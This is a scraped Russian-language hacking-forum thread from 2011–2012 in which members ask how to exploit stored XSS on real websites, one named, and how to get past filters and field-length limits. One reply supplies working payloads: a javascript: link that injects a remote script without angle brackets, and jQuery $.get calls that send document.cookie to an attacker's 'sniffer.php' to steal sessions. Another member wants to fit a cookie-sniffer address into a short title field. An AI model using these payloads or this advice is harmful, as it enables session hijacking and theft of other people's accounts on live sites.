 |
|
14.12.2011, 01:00
|
|
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами:
8345846
Репутация:
221
|
|
|
|
|
16.12.2011, 01:00
|
|
Новичок
Регистрация: 14.12.2011
Сообщений: 2
С нами:
7585526
Репутация:
0
|
|
Всем привет, вот есть активная xss: http://kib-net.ru/personal/index.php(там при регистрации в имя\фамилию вводим алерт), вопрос, как заюзать эту уязвимость, ведь там вроде никто к тебе в профиль зайти не может, как тогда? |
|
|
|
17.12.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
cacucko, никак не заюзаешь. Страница с xss недоступна авторизованным пользователям, следовательно сессию увести не получится.
|
|
|
|
17.01.2012, 01:00
|
|
Познающий
Регистрация: 26.02.2010
Сообщений: 92
С нами:
8530166
Репутация:
7
|
|
Товарищи
На одном сайте решил проверить есть ли уязвимость xss.
Ввел в php запрос alert('xss')
оказалось стоит фильтр и запрос изменил мою строчку и вывел %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
скажите возможно ли обойти этот фильтр?
|
|
|
|
18.01.2012, 01:00
|
|
Новичок
Регистрация: 01.08.2010
Сообщений: 8
С нами:
8305526
Репутация:
0
|
|
Цитата:
Сообщение от Lonsdalesar
Товарищи
На одном сайте решил проверить есть ли уязвимость xss.
Ввел в php запрос alert('xss')
оказалось стоит фильтр и запрос изменил мою строчку и вывел %3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
скажите возможно ли обойти этот фильтр?
Если это в адрессной строке,то это нефильтр)Это одно и тожэ что и alert('xss'), только url-code, так сказать, нечем неотличаются, нечего страшного) А если, товарищ это в самом коде...то фильтр скорей всего)
|
|
|
|
19.01.2012, 01:00
|
|
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами:
7526486
Репутация:
-10
|
|
|
|
|
|
19.01.2012, 01:00
|
|
Постоянный
Регистрация: 17.02.2011
Сообщений: 495
С нами:
8017526
Репутация:
18
|
|
|
|
|
|
06.02.2012, 01:00
|
|
Познающий
Регистрация: 03.12.2010
Сообщений: 87
С нами:
8126966
Репутация:
8
|
|
В чем проблема нашел Активную Xss - Это не новость но дело не в этом.
Xss находиться в поле ввода - но дело в том что стоит ограничение по символам - т.е полность скрипт не удается записать.
Это была первая проблема.
Вторая Xss находится на форме тут я решил применить Xss без Xss.
Уязвимость в бб тегах а именно вСпойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
. Втавляешь все нормально - но после вставки кода -
Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Наблюдаем следущию картину -
Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Буду рад помощи.
|
|
|
|
06.02.2012, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами:
8484086
Репутация:
335
|
|
Тут угловые скобки заменяются html сущностями. Видать прогнали через функцию htmlspecialchars(). И тут судя по всему скрипт срабатывает по нажатию по ссылки. Нередкий тип уязвимости. Так как тэг скрипта фильтруется, то закачать сам скрипт извне не получится. Но можно попробовать динамически создать скрипт и присвоить ему урл скрипта, лежащего на нашем сервере. Что-то типа
code:
javascript:x=document.createElement('script');x=x.setAttribu te('src','тут урл скрипта');document.getElementsByTagName('he ad').appendChild(x);
Таким образом мы не используя угловые скобки создаем динамический скрипт и подключаем к нему ресурс. Также, если на странице используется jQuery, можно просто поспользоваться этим, прописав
code:
javascript:jQuery.get('http://yoursite.com/sniffer.php?'+document.cookie);
или
javascript:$.get('http://yoursite.com/sniffer.php?'+document.cookie);
При клике данный метод позволяет отправлять get запросы на любой домен в сети. Недавно именно данный метод использовал в xss на одном из известных сайтов. И даже видео снимал. https://hpc.name/showthread.php?t=32341. Посмотри, там именно такого же рода уязвимость, что и у тебя. |
|
|
|
06.02.2012, 01:00
|
|
Познающий
Регистрация: 15.11.2011
Сообщений: 81
С нами:
7627286
Репутация:
-3
|
|
Нашел xss в объявлениях. Когда в заголовке пишу скрипт проверки alert("xss") , сообщение видно. А вот когда пишу адрес к снифферу пишет СЛИШКОМ ДЛИННЫЙ ЗАГОЛОВОК. Можно до 25символов добавить в заголовок, что делать? Еще слышал про слепые XSS может кто-нибудь даст ссылку на статью?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
